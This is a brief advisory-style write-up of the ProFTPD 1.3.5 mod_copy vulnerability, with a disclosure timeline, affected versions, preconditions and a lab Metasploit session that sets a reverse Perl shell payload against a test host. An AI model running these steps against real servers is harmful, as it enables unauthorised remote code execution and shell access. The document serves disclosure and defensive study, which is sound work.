Vulnerability discovered and reported to the vendor by Vadim Melihow the 2015-04-07
Workaround provided by the vendor the 2015-04-07
Vulnerability details released the 2015-04-13
Metasploit PoC provided the 2015-04-22
Patch provided by the vendor the 2015-05-28
PoC provided by :
Affected version(s) :
All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1
Tested on :
Centos 6.7 with ProFTPD 1.3.5
This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the ‘nobody’ user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.
This vulnerability is only triggered in particular conditions:
– ProFTPD need to have the rights to write into a web accessible folder having the privileges of ProFTPD.
– SELinux must be disabled
ProFTPD is running with user and group “nobody” ProFTPD is configured with “LoadModule mod_copy.c” in proftpd.conf file A “test” folder has been created in “/var/www/html/“ with nodody:nobody privileges use exploit/unix/ftp/proftpd_modcopy_exec set RHOST 192.168.6.154 set SITEPATH /var/www/html/test set TARGETURI /test/ set PAYLOAD cmd/unix/reverse_perl set LHOST 192.168.6.138 run id Done !